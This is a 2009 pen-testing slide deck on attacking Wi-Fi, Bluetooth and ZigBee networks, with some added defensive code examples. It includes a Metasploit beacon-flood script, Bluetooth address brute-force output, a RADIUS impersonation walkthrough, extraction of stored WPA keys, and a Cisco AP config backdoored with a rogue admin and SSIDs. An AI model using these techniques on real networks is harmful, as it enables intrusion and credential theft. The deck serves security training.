Wireless Weaponry
Tools, Tips and Techniques for Effective Wireless Pen Testing
Joshua Wright
[email protected]
Copyright 2009, All Rights Reserved
Wireless Weaponry - ©2009, Joshua Wright
Your Speaker
Chef-Style TFH
• Joshua Wright
• Senior Security Analyst, InGuardians
• Senior SANS Instructor, Ethical Hacking Wireless course author
• [email protected]
• [email protected]
Introduction
• General false sense of security with regard to wireless
  – "What, WPA doesn't solve all my problems?!?" (Answer: No, it doesn't)
• Not just WiFi; Bluetooth, ZigBee and proprietary protocols
• Wireless Weaponry: Pragmatic tools and techniques for better pen tests
Outline
• Scanning and Reconnaissance
• Exploitation
• Post-Exploitation
• Wireless Use and Exploitation Evolution
• Conclusions and Q&A
Kismet is a Staple Tool
• Kismet Stable has many features that are often overlooked
  – Multiple simultaneous interfaces
  – CSV and XML data for post-processing analysis
  – Controlling the channel hopping sequence for more effective coverage
• Kismet Newcore introduces performance, UI, and functionality improvements
Kismet for Pen Testers
• One or more high-gain USB cards (ALFA) as primary interface
  – One card for channel hopping
  – Second card for locking the channel hopper on interesting networks
• Atheros PC Card for b/g/a sniffing
  – Most activity is still on b/g
• Change channel sequence to hop to 1, 6, 11 more frequently (or 1, 4, 8, 11 if deployed)
Hacking the Kismet Stable Channel Hopper
– 5 channels == ~1 second
defaultchannels=IEEE80211g:1,1,1,1,1,7,6,6,6,6,6,4,11,11,11,11,11,8,1,…
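To see what the weighted sequence above buys and what it costs, an added Python example (not Kismet's code or the author's) builds a hop list in the slide's pattern, reports each channel's share of listening time and its worst-case revisit gap at the slide's ~5 hops per second, and emits the matching kismet.conf line. The favored and other channel sets are assumptions.

```python
from collections import defaultdict

HOP_RATE_HZ = 5  # Kismet Stable default from the slide: ~5 channels per second


def weighted_hop_sequence(favored, others, dwell=5):
    """Build a hop list in the slide's pattern: stay on one favored channel for
    `dwell` slots, spend a single slot on the next 'other' channel, and rotate
    through the favored channels so every channel is still visited."""
    seq = []
    for i, other in enumerate(others):
        seq += [favored[i % len(favored)]] * dwell
        seq.append(other)
    return seq


def coverage(seq, hop_rate_hz=HOP_RATE_HZ):
    """Per channel: share of listening time and the worst-case gap in seconds
    between two visits, treating the sequence as a repeating cycle."""
    positions = defaultdict(list)
    for idx, ch in enumerate(seq):
        positions[ch].append(idx)
    report = {}
    for ch, pos in positions.items():
        gaps = [b - a for a, b in zip(pos, pos[1:])]
        gaps.append(pos[0] + len(seq) - pos[-1])  # wrap-around into the next cycle
        report[ch] = {"share": len(pos) / len(seq), "max_gap_s": max(gaps) / hop_rate_hz}
    return report


def kismet_defaultchannels(seq, phy="IEEE80211g"):
    """Emit the kismet.conf line in the Kismet Stable syntax the slide uses."""
    return f"defaultchannels={phy}:" + ",".join(str(ch) for ch in seq)


if __name__ == "__main__":
    # Assumed channel sets: 1/6/11 favored (most b/g activity), the rest visited once per cycle
    weighted = weighted_hop_sequence([1, 6, 11], [2, 3, 4, 5, 7, 8, 9, 10])
    for label, seq in (("uniform 1-11", list(range(1, 12))), ("weighted", weighted)):
        rep = coverage(seq)
        print(f"{label}: ch1 share {rep[1]['share']:.2f}, ch7 revisit gap {rep[7]['max_gap_s']:.1f}s")
    print(kismet_defaultchannels(weighted))
```

The trade-off is visible in the numbers: weighting triples the time on channel 1 but stretches the revisit gap on a lightly used channel from about 2 seconds to almost 10, so a short-lived network on channel 7 is easier to miss.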
Kismet Newcore
• Not just 802.11 anymore
  – DECT scanning plugin
  – ZigBee/802.15.4 scanning in progress
• Not just passive anymore
  – Plugins actively manipulate the network (not default, but possible)
• Not just analysis anymore
  – Live PTW WEP cracking, for starters
Cisco Spectrum Expert
~$3000
Bluetooth Enumeration
• Many (all?) Bluetooth devices respond to *:*:AA:BB:CC:DD
• Knowing the last 3 bytes, can test 256 values to find the target
• Optimized using BNAP, BNAP data
# ruby bt-uap-search.rb 4 EC:47:86
Contacting 4A:57:00:EC:47:86 using hci0 (1/256)
Contacting 4A:57:01:EC:47:86 using hci1 (2/256)
Contacting 4A:57:02:EC:47:86 using hci2 (3/256)
Contacting 4A:57:03:EC:47:86 using hci3 (4/256)
Contacting 4A:57:25:EC:47:86 using hci1 (38/256)
Contacting 4A:57:26:EC:47:86 using hci3 (39/256)
TARGET FOUND: 4A:57:25:EC:47:86 (hci1)
Hey, What Happened to Pragmatism?
Bluetooth serial adapter
• Scanning for Bluetooth still takes a long time
  – Not practical or useful to find someone's iPhone (usually)
• Targeted attacks may be worthwhile
  – Credit card processing systems
Pragmatic Exploitation
• Keep an eye out for the little things
• Don't let an ad-hoc network pass you by
  – XP clients, printers common
• Watch guest networks for internal employees (NBNS broadcasts)
  – Often escaping web filtering
  – Target these clients directly as guest
• What networks are clients probing for?
Karmetasploit
• Magic WiFi from the Metasploit project
– "Hi, I'm the network you asked for, and every other network in the world. Here are a bunch of exploits, kthxbye."
• Becoming more difficult to leverage against Vista and XP SP3
– Clients wait to hear beacons from their preferred network before probing
• We can beacon too …
Chaka Kahn
Wait, what?
• Injects beacons using common SSIDs
  – Courtesy of the top-SSID list from wigle.net
• Causes clients to think their preferred networks are available, leading to probes
# ./msfconsole -r ssidlist.rc
       =[ msf v3.3-dev
+ -- --=[ 295 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 60 aux
resource> use auxiliary/dos/wireless/ssidlist_beacon
resource> set DRIVER madwifing
DRIVER => madwifing
resource> set INTERFACE wifi0
INTERFACE => wifi0
resource> set CHANNEL 1
CHANNEL => 1
resource> exploit
[*] Sending beacon frames...
Exploiting PEAP
• Attacking RADIUS server TLS validation by the client
  – Client typically validates the cert, but does not enforce a given CN
  – Client often allowed to accept or reject a new certificate from RADIUS
• FreeRADIUS-WPE: Modified RADIUS server to exploit PEAP, others
RADIUS Impersonation
1. Attacker sniffs network, identifies CA in use
2. Attacker buys wireless cert from same CA for CN "evilhacker.net"
3. Attacker starts FreeRADIUS-WPE with AP using victim SSID
4. Attacker deauths victim (or waits patiently for a roam operation)
5. Victim connects to attacker AP, gets RADIUS cert
6. Cert is trusted, but not previously observed. Victim is prompted to accept
7. Victim accepts, attacker obtains MS-CHAPv2 credentials, disappears.
[Diagram: Victim, WPA2+PEAP Access Point, Corporate Network, RADIUS Server, CA; steps 1-6 annotated, including the spoofed deauthenticate at step 4. Callout: WZC displays name, not CN]
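The client-side control that closes steps 2 and 6 of this scenario, shown as an added wpa_supplicant example rather than anything from the slides: the weak profile accepts any server certificate a public CA bundle can verify, which is exactly what a purchased "evilhacker.net" cert satisfies, while the hardened profile pins the corporate RADIUS CA and requires the server certificate's name to match. The SSID is taken from the Aironet config later in the deck; the identity, file paths and server name are assumptions.

```conf
# Weak: chain validation only. Any certificate issued by any CA in the public
# bundle passes, so a cert bought from the "same CA" for another CN is accepted.
network={
    ssid="KJOCorpNet"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"                              # assumed user
    password="hypothetical-password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/ca-certificates.crt"
}

# Hardened: trust only the corporate RADIUS CA and insist on the expected
# server name, so a valid-but-wrong certificate fails before MS-CHAPv2 starts.
network={
    ssid="KJOCorpNet"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hypothetical-password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/wpa_supplicant/corp-radius-ca.pem"   # assumed path
    domain_match="radius.corp.example"               # assumed RADIUS server name
}
```

Because the check is enforced by the supplicant rather than offered to the user, there is no step 6 prompt for the victim to accept.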
Long-Range WiFi Attacks
Client Compromise
• Concept: Leverage client compromise to attack internal wireless networks
• Vista introduces an all-new wireless stack
• NDIS 6 requires wireless drivers to support monitor-mode packet capture
  – Previously limited to Linux or commercial drivers
• Unfortunately, not exposed in any built-in applications
• Tools: vistarfmon, nm2lp (InGuardians), NetMon (Microsoft)
Capturing Vista Wireless Traffic
• With RFMON capture, we can use the Vista host to discover and attack nets
  – It's like having a remote Linux box, sort of
• Packet capture supplied by Microsoft NetMon 3.3
  – Silent command-line install and capture… no reboot
• Attacker can enumerate, analyze and attack wireless networks seen by the victim
• No attack tools read NetMon WLAN captures
• Solution: nm2lp from InGuardians!
[Diagram: Internet, Compromised Vista Host, Corporate Access Point, Corporate Wireless Client; analysis tools: Ettercap, Kismet, Aircrack-ng, coWPAtty]
Vista Wireless Power Tools
Victim System:
C:\>vistarfmon
vistarfmon: Enable and disable monitor mode on Vista NDIS 6 interfaces.
Copyright (c) 2008 Joshua Wright
Available interface(s):
  1. Intel(R) Wireless WiFi Link 4965AGN, Mode: ExSta, State: connected
C:\>vistarfmon 1 mon
Operation mode set to Monitor.
C:\>nmcap /Network "Wireless Network Connection" /Capture WiFi /File wlan.cap
Netmon Command Line Capture (nmcap) 3.2.1303.0
Loading Parsers ...
Saving info to: C:\\wlan.cap - using circular buffer of size 20.00 MB.
Pen Tester System:
C:\>nm2lp
nm2lp: Convert NetMon 3.2 capture to libpcap format (version 1.0).
Copyright (c) 2008 Joshua Wright
Usage: nm2lp
C:\>nm2lp wlan.cap wlan.dump
Extracting Stored Wireless Keys
• Dictionary attacks against PSK are mildly interesting
  – Distributed CUDA acceleration is fun too
• Biggest issue is the distributed storage of keys and lack of frequent rotation
• U3 Autorun fun and WirelessKeyView
C:\>wirelesskeyview /stext wlankeys.txt
C:\>type wlankeys.txt
Network Name (SSID): somethingclever
Key Type           : WPA-PSK
Key (Hex)          : 66616d696c79206d6f766965206e6967687400
Key (Ascii)        : family movie night
Where is that AP/Controller?
Many APs reveal their IP address in management frames, or in data frames carrying management traffic (Cisco Aironet in this example, 172.16.0.92)
Attacking AP Management Interface
• APs themselves are useful targets
  – Management interfaces exposed on guest networks
  – Compromised client access to device
• Weak passwords, weak protocols, RADIUS manipulation, cookie theft
• Once you control the AP, you can have lots of fun on the network
  – Especially when the AP is on a .1q port
Ghost in the AP Attack
Before:
username admin1 privilege 15 secret 5 $1$9Q...
username admin2 privilege 1 secret 5 $1$8oR...
aaa authentication login local enable
interface Dot11Radio0
 encryption vlan 101 ciphers aes-ccm
!
ssid KJOCorpNet
 vlan 101
 guest-mode
 authentication network-eap eap_methods
!
ssid KJOGuest
 vlan 156
 guest-mode
 authentication open

After (Eeek!):
username admin1 privilege 15 secret 5 $1$9Q...
username admin2 privilege 1 secret 5 $1$8oR...
username acoop privilege 15 secret "evilpass"
aaa authentication login local enable
interface Dot11Radio0
 encryption vlan 101 ciphers aes-ccm
 encryption vlan 1 ciphers aes-ccm
 encryption vlan 102 ciphers aes-ccm
!
ssid KJOCorpNet
 vlan 101
 guest-mode
 authentication network-eap eap_methods
!
ssid KJOGuest
 vlan 156
 guest-mode
 authentication open
!
! Backdoor network access SSID on mgmt VLAN
ssid attackerBackdoorWlan
 wpa-psk ascii KevinReallyWearsGlasses
 vlan 1
 no guest-mode
!
! Attacking any other accessible VLAN example
ssid attackVlan102
 wpa-psk ascii YouWontGuessThisWpaPsk
 vlan 102
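Every change the attacker made to the Aironet config is visible in a backed-up copy, so a defender can diff it against a known baseline. The added Python example below (not from the slides) audits a config in that format for the four tells shown: a new privilege-15 user, a secret not stored in hashed type-5 form, SSIDs missing from the approved list, and any SSID bound to the management VLAN. The sample config is constructed from the slide's "After" values; the baseline sets are assumptions.

```python
import re

# Constructed sample built from the slide's post-compromise config
# (user names, SSIDs, VLANs and the truncated hashes are the slide's values).
COMPROMISED_CONFIG = """\
username admin1 privilege 15 secret 5 $1$9Q...
username admin2 privilege 1 secret 5 $1$8oR...
username acoop privilege 15 secret "evilpass"
interface Dot11Radio0
 encryption vlan 1 ciphers aes-ccm
!
ssid KJOCorpNet
 vlan 101
!
ssid KJOGuest
 vlan 156
!
ssid attackerBackdoorWlan
 wpa-psk ascii KevinReallyWearsGlasses
 vlan 1
!
ssid attackVlan102
 wpa-psk ascii YouWontGuessThisWpaPsk
 vlan 102
"""

# username <name> privilege <n> secret <type-or-cleartext> ...
USER_RE = re.compile(r"^username\s+(\S+)\s+privilege\s+(\d+)\s+secret\s+(\S+)")


def audit(config, expected_ssids, expected_admins, mgmt_vlan=1):
    """Return the list of deviations from the baseline, in config order."""
    findings, cur = [], None
    for raw in config.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            user, priv, kind = m.group(1), int(m.group(2)), m.group(3)
            if kind != "5":  # "secret 5 <hash>" is the hashed form; anything else is in the clear
                findings.append(f"cleartext secret for user {user}")
            if priv == 15 and user not in expected_admins:
                findings.append(f"unexpected privilege-15 user {user}")
        elif line.startswith("ssid "):  # start of an ssid stanza
            cur = line.split(None, 1)[1]
            if cur not in expected_ssids:
                findings.append(f"unexpected SSID {cur}")
        elif line == "!":  # stanza terminator
            cur = None
        elif cur and line.startswith("vlan ") and int(line.split()[1]) == mgmt_vlan:
            findings.append(f"SSID {cur} bridged to management VLAN {mgmt_vlan}")
    return findings


if __name__ == "__main__":
    for f in audit(COMPROMISED_CONFIG, {"KJOCorpNet", "KJOGuest"}, {"admin1"}):
        print("FINDING:", f)
```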
Complacent Wireless Security
• My growing concern over wireless security
  – "Where there is a wireless, there is a way"
• Effective wireless pen testing is not possible in a 2-hour non-obstructive engagement
  – And not a practical reflection of an actual attack
• Customer value-add with educated attack concessions
  – "Let's talk about the resources of your adversary, and the time they could invest into cracking your WPA-PSK key. We can continue the pen test from there."
Wireless Adoption
• Continued wireless adoption reaching new verticals
  – ZigBee and 802.15.4 growing in popularity for low-power needs (retail, manufacturing)
• Smart Grid wireless technology on every home
  – WiMAX, cellular or proprietary uplink
  – ZigBee in the home area network (HAN)
Wireless penetration testing incorporates multiple protocols, techniques and skill sets
ZigBee Pen Testing
• Current ZigBee lacks robust security
  – "Residential" or "standard security" mode == plaintext key delivery OTA
  – No mutual authentication available
• ZigBee Pro (2007) stack improves security, at the cost of flash, memory, CPU
  – Will not be adopted by all vendors
• Distributed keys on all devices; hardware key extraction remains viable
• New retail profile makes ZigBee a financially viable target for attackers (CC transmissions at stores)
  – But, you have to find the device first
zbfind
"… due to the low-cost nature of ad hoc network devices, one cannot generally assume the availability of tamper resistant hardware. Hence, physical access to a device may yield access to secret keying material and other privileged information, as well as access to the security software and hardware."
ZigBee Specification 053474r17, Jan. 2008
Conclusion
• Wireless pen testing has many angles
  – Not just attacker → AP → Pwned
• Pragmatic recon, exploit, post-exploit recommendations
• Talk to your customer about the best use of your time (and their money) for an effective test
• Don't get caught up in a single wireless technology
  – WiFi, Bluetooth, WiMAX, ZigBee, proprietary are all areas you should be targeting
• Help change your complacent customer's mind about the risks and threats of wireless
Q+A, Resources
Joshua Wright
Office/Mobile: 401-524-2911
[email protected]
[email protected]
www.inguardians.com
www.willhackforsushi.com

SANS Ethical Hacking Wireless Course - www.sans.org/training/description.php?mid=3
vistarfmon - www.inguardians.com/tools
nm2lp - www.inguardians.com/tools
zbfind - Contact Josh
Cisco Spectrum Expert - www.cisco.com/en/US/products/ps9393
Kismet Stable - www.kismetwireless.net
Kismet Newcore - www.kismetwireless.net
WiFiFoFum - iPhone Store, www.aspecto-software.com/rw/applications/wififofum
Chaka Kahn - www.willhackforsushi.com/code/ssidlist_beacon.rb
FreeRADIUS-WPE - www.willhackforsushi.com/?page_id=37
NetMon 3.3 - connect.microsoft.com/site/sitehome.aspx?SiteID=216
wirelesskeyview